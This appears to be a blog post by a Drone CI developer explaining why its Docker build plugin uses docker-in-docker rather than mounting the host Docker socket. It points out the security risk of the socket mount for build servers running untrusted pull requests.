I am writing this article because drone has a plugin for building and publishing Docker images that uses docker in docker (dind). I am occasionally asked why I would take such an approach, followed by a link to a blog post by jpetazzo which advises against dind.
In his blog post Jerome suggests the ideal solution is the following:
Simply put, when you start your CI container (Jenkins or other), instead of hacking something together with Docker-in-Docker, start it with:
docker run -v /var/run/docker.sock:/var/run/docker.sock
The biggest problem with this approach is security. If you are mounting the docker socket into your build container you are granting your build container root access to your host machine. I can think of a number of trivial ways the docker socket can be used to compromise your system, such as starting a docker container that mounts your host machines filesystem, giving it access to your entire system. Game over.
This is especially a concern for build servers, which have access to sensitive information and passwords in order to perform auto-deployment tasks. Gaining access to the host machine could allow this information to be intercepted, and your production systems compromised.
Now this is probably not an issue if you are running Jenkins for your small team of trusted developers. This solution is not acceptable, however, if you are running builds for an open source project that accepts pull requests or if your organization is highly regulated and has strict access-control policies. But won't code reviews solve this? A malicious developer could open a trivial pull request that takes advantage of access to the docker socket to compromise your host machine.
This is the primary reason we have chosen not to mount the host machines Docker socket into your build environment by default. The baseline version of Drone needs to provide a minimum level of security for multiple use cases, and not just small teams in trusted environments. That being said, Drone will happily get out of your way and mount the host machines Docker socket into your build container if your project is white-listed.
In conclusion, I think it is important to remember that different systems have different requirements and constraints and this is reflected in our design decisions. I doubt Jerome wrote this blog post as a sweeping statement that should be taken as canon in the Docker world. He was simply proposing that most people may be un-necessarily using dind without understanding the alternatives. In this case, I have heavily considered the alternatives and believe this was the best decision for Drone.